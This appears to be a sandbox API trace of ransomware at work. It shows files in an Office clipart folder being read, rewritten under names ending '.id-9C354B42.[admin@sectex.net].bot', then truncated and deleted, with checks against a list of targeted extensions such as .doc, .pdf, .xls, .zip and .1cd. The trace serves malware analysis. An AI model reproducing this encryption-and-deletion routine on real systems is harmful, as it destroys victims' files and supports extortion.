	[0140.121] CloseHandle (hObject=0x31c) returned 1
	[0140.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 0x20
	[0140.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.122] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.122] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.122] GetLastError () returned 0x0
	[0140.123] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1c0a, lpOverlapped=0x0) returned 1
	[0140.124] WriteFile (in: hFile=0x3a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1c10, lpOverlapped=0x0) returned 1
	[0140.125] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.125] WriteFile (in: hFile=0x3a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.125] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.125] CloseHandle (hObject=0x3a0) returned 1
	[0140.126] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.126] SetEndOfFile (hFile=0x31c) returned 1
	[0140.130] CloseHandle (hObject=0x31c) returned 1
	[0140.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 1
	[0140.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.131] lstrlenW (lpString=".doc") returned 4
	[0140.131] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.131] lstrlenW (lpString=".docx") returned 5
	[0140.131] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.131] lstrlenW (lpString=".pdf") returned 4
	[0140.131] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.131] lstrlenW (lpString=".xls") returned 4
	[0140.131] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.131] lstrlenW (lpString=".xlsx") returned 5
	[0140.131] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.131] lstrlenW (lpString=".ppt") returned 4
	[0140.131] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString=".zip") returned 4
	[0140.132] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString=".rar") returned 4
	[0140.132] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString=".bz2") returned 4
	[0140.132] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.132] lstrlenW (lpString=".7z") returned 3
	[0140.132] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString=".dbf") returned 4
	[0140.132] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString=".1cd") returned 4
	[0140.132] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString=".jpg") returned 4
	[0140.132] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.132] lstrlenW (lpString=".doc") returned 4
	[0140.132] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.132] lstrlenW (lpString=".docx") returned 5
	[0140.132] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.132] lstrlenW (lpString=".pdf") returned 4
	[0140.132] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString=".xls") returned 4
	[0140.132] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString=".xlsx") returned 5
	[0140.132] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.132] lstrlenW (lpString=".ppt") returned 4
	[0140.132] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.133] lstrlenW (lpString=".zip") returned 4
	[0140.133] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.133] lstrlenW (lpString=".rar") returned 4
	[0140.133] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.133] lstrlenW (lpString=".bz2") returned 4
	[0140.133] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.133] lstrlenW (lpString=".7z") returned 3
	[0140.133] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.133] lstrlenW (lpString=".dbf") returned 4
	[0140.133] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.133] lstrlenW (lpString=".1cd") returned 4
	[0140.133] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63
	[0140.133] lstrlenW (lpString=".jpg") returned 4
	[0140.133] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.133] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.133] lstrlenW (lpString="INDST_01.MID") returned 12
	[0140.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.134] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=8568) returned 1
	[0140.134] CloseHandle (hObject=0x31c) returned 1
	[0140.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 0x20
	[0140.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.135] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.135] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.135] GetLastError () returned 0x0
	[0140.135] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2178, lpOverlapped=0x0) returned 1
	[0140.137] WriteFile (in: hFile=0x3a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2180, lpOverlapped=0x0) returned 1
	[0140.138] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.138] WriteFile (in: hFile=0x3a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.138] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.167] CloseHandle (hObject=0x3a0) returned 1
	[0140.167] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.168] SetEndOfFile (hFile=0x31c) returned 1
	[0140.175] CloseHandle (hObject=0x31c) returned 1
	[0140.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 1
	[0140.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.204] lstrlenW (lpString=".doc") returned 4
	[0140.204] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.204] lstrlenW (lpString=".docx") returned 5
	[0140.204] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.204] lstrlenW (lpString=".pdf") returned 4
	[0140.204] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.204] lstrlenW (lpString=".xls") returned 4
	[0140.204] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.204] lstrlenW (lpString=".xlsx") returned 5
	[0140.204] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.204] lstrlenW (lpString=".ppt") returned 4
	[0140.204] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.204] lstrlenW (lpString=".zip") returned 4
	[0140.205] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.205] lstrlenW (lpString=".rar") returned 4
	[0140.205] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.205] lstrlenW (lpString=".bz2") returned 4
	[0140.205] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.205] lstrlenW (lpString=".7z") returned 3
	[0140.205] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString=".dbf") returned 4
	[0140.205] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString=".1cd") returned 4
	[0140.205] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString=".jpg") returned 4
	[0140.205] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString=".doc") returned 4
	[0140.205] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.205] lstrlenW (lpString=".docx") returned 5
	[0140.205] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.205] lstrlenW (lpString=".pdf") returned 4
	[0140.205] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.205] lstrlenW (lpString=".xls") returned 4
	[0140.205] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.205] lstrlenW (lpString=".xlsx") returned 5
	[0140.205] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.205] lstrlenW (lpString=".ppt") returned 4
	[0140.205] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.205] lstrlenW (lpString=".zip") returned 4
	[0140.206] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.206] lstrlenW (lpString=".rar") returned 4
	[0140.206] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.206] lstrlenW (lpString=".bz2") returned 4
	[0140.206] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.206] lstrlenW (lpString=".7z") returned 3
	[0140.206] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.206] lstrlenW (lpString=".dbf") returned 4
	[0140.206] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.206] lstrlenW (lpString=".1cd") returned 4
	[0140.206] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63
	[0140.206] lstrlenW (lpString=".jpg") returned 4
	[0140.206] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.206] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.206] lstrlenW (lpString="JAVA_01.MID") returned 11
	[0140.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.207] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9797) returned 1
	[0140.207] CloseHandle (hObject=0x3a0) returned 1
	[0140.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 0x20
	[0140.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.207] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.207] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0140.208] GetLastError () returned 0x0
	[0140.208] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2645, lpOverlapped=0x0) returned 1
	[0140.214] WriteFile (in: hFile=0x3b4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2650, lpOverlapped=0x0) returned 1
	[0140.215] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.215] WriteFile (in: hFile=0x3b4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0140.215] SetEndOfFile (hFile=0x3b4) returned 1
	[0140.215] CloseHandle (hObject=0x3b4) returned 1
	[0140.215] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.215] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.309] CloseHandle (hObject=0x3a0) returned 1
	[0140.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 1
	[0140.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.327] lstrlenW (lpString=".doc") returned 4
	[0140.327] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.327] lstrlenW (lpString=".docx") returned 5
	[0140.327] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.327] lstrlenW (lpString=".pdf") returned 4
	[0140.327] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.327] lstrlenW (lpString=".xls") returned 4
	[0140.327] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.327] lstrlenW (lpString=".xlsx") returned 5
	[0140.327] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.327] lstrlenW (lpString=".ppt") returned 4
	[0140.328] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString=".zip") returned 4
	[0140.328] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.328] lstrlenW (lpString=".rar") returned 4
	[0140.328] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.328] lstrlenW (lpString=".bz2") returned 4
	[0140.328] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.328] lstrlenW (lpString=".7z") returned 3
	[0140.328] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString=".dbf") returned 4
	[0140.328] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString=".1cd") returned 4
	[0140.328] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString=".jpg") returned 4
	[0140.328] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.328] lstrlenW (lpString=".doc") returned 4
	[0140.328] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.328] lstrlenW (lpString=".docx") returned 5
	[0140.328] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.328] lstrlenW (lpString=".pdf") returned 4
	[0140.328] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.328] lstrlenW (lpString=".xls") returned 4
	[0140.328] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.328] lstrlenW (lpString=".xlsx") returned 5
	[0140.328] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.328] lstrlenW (lpString=".ppt") returned 4
	[0140.328] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.329] lstrlenW (lpString=".zip") returned 4
	[0140.329] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.329] lstrlenW (lpString=".rar") returned 4
	[0140.329] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.329] lstrlenW (lpString=".bz2") returned 4
	[0140.329] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.329] lstrlenW (lpString=".7z") returned 3
	[0140.329] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.329] lstrlenW (lpString=".dbf") returned 4
	[0140.329] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.329] lstrlenW (lpString=".1cd") returned 4
	[0140.329] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62
	[0140.329] lstrlenW (lpString=".jpg") returned 4
	[0140.329] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.329] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.329] lstrlenW (lpString="JNGLE_01.MID") returned 12
	[0140.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.330] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=5843) returned 1
	[0140.330] CloseHandle (hObject=0x398) returned 1
	[0140.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 0x20
